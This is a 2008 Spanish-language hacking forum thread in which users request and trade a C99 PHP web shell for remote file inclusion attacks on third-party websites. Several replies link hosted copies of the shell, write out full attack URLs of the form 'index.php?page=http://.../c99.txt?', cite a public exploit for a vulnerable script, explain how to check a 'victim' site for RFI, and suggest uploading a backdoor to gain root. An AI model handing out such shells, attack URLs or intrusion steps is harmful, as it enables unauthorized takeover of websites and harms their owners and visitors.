elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  shell para rfi
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: shell para rfi  (Leído 8,344 veces)
Tyrz


Desconectado Desconectado

Mensajes: 927


Get big or die tryin'


Ver Perfil WWW
shell para rfi
« en: 26 Enero 2008, 11:02 am »

necesito una shell para rfi, me podéis decir si hay alguna web que tenga una o si en hosting gratuitos te deja subirla? Es que no creo q en un hosting gratuito te dejen usar system() o execute()
Gracias ;)
En línea

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: shell para rfi
« Respuesta #1 en: 26 Enero 2008, 15:00 pm »

C99
http://usuarios.lycos.es/elitehacknet/C99Shell.txt

salu2
pd,
a la hora de ejecutarlo tienes que pones un "?" al final de txt
para que se ejecute y no salga como texto plano....

ej:

Código:
www.webvictima.com/index.php?page=http://usuarios.lycos.es/elitehacknet/C99Shell.txt?

_
En línea

Tyrz


Desconectado Desconectado

Mensajes: 927


Get big or die tryin'


Ver Perfil WWW
Re: shell para rfi
« Respuesta #2 en: 26 Enero 2008, 15:47 pm »

me sale como texto plano con el ? =S
En línea

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: shell para rfi
« Respuesta #3 en: 26 Enero 2008, 18:09 pm »

aquí la tienes en formato gif que te la he subido a un host:

Código:
http://www.freewebtown.com/sagitari/c99.gif

Si no te funciona prueba de poner el " ? " al final de gif..

salu22

En línea

Tyrz


Desconectado Desconectado

Mensajes: 927


Get big or die tryin'


Ver Perfil WWW
Re: shell para rfi
« Respuesta #4 en: 26 Enero 2008, 20:27 pm »

No se puede mostrar la imagen “http://www.freewebtown.com/sagitari/c99.gif” porque contiene errores.

Con y sin ? sale eso =S

Con algunas sirve y con otras no, xq?
Gracias por subirme las shells tio te debo una ;)
En línea

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf
Tyrz


Desconectado Desconectado

Mensajes: 927


Get big or die tryin'


Ver Perfil WWW
Re: shell para rfi
« Respuesta #5 en: 26 Enero 2008, 20:53 pm »

funcionan bien las shell? no me deja ver code ni subir cosas
En línea

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: shell para rfi
« Respuesta #6 en: 26 Enero 2008, 21:19 pm »

a ver.. estás seguro de que puedes hacer RFI en la web que estás probando?..
mándame el link "de la web víctima" por mensaje privado.. porque por aquí no puedes dar datos de terceros..

porque a lo mejor la web te estás equivocando, no es vulnerable a rfi y no deja incluir archivos externos....
o la web está en lenguaje asp? porque entonces lógico que no pueda leer shells en php ..

salu2 ...

pd, soy tía
y de nada!
En línea

BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
Re: shell para rfi
« Respuesta #7 en: 27 Enero 2008, 06:25 am »

buenas amigos tengo el mismo problema intente  C99Shell.txt , c99.gif pero nada me sigue abriendo la pagina normal...


segun un scaning que le realize la web es vulnenable ha

Linkliste Index.PHP Multiple Remote File Include Vulnerabilities

http://www.securityfocus.com/bid/26045/exploit

http://webvulnerable/index.php?page=http://usuarios.lycos.es/elitehacknet/c99.gif
http://webvulnerable/index.php?page=http://usuarios.lycos.es/elitehacknet/c99.txt?

En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
Tyrz


Desconectado Desconectado

Mensajes: 927


Get big or die tryin'


Ver Perfil WWW
Re: shell para rfi
« Respuesta #8 en: 27 Enero 2008, 10:31 am »

mándame la web por mp y te miro a ver pero no siempre son vulnerables aun que parezca que si, yo tengo como 10 guardadas que no puedo hacerles nada.
Que valla guay
En línea

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: shell para rfi
« Respuesta #9 en: 27 Enero 2008, 19:34 pm »

mándame la web por mp y te miro a ver pero no siempre son vulnerables aun que parezca que si, yo tengo como 10 guardadas que no puedo hacerles nada.
Que vaya guay

es lo que te dije por privado..
hay muchas que al introducir la shell no te deja subir archivos
ni modificar
porque no tienes permisos de escritura 777
porque no eres root
y solamente tienes permisos de lectura..
entonces para poder tener permisos de root
tienes que subir un backdoor

pero eso no significa que no sea vulnerable
solamente resulta un poco más complejo
modificar la web..


Citar
buenas amigos tengo el mismo problema intente  C99Shell.txt , c99.gif pero nada me sigue abriendo la pagina normal...

pues no será vulnerable..
prueba:

Código:
www.webvictima.com/index.php?page=http://google.es

si no se te abre la web de google no es vulnerable...

y hay veces que el archivo que introduces sí se abre
pero de forma ajena al servidor.. por lo tanto no afectaría....
ni sería vulnerable.......

salu2
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines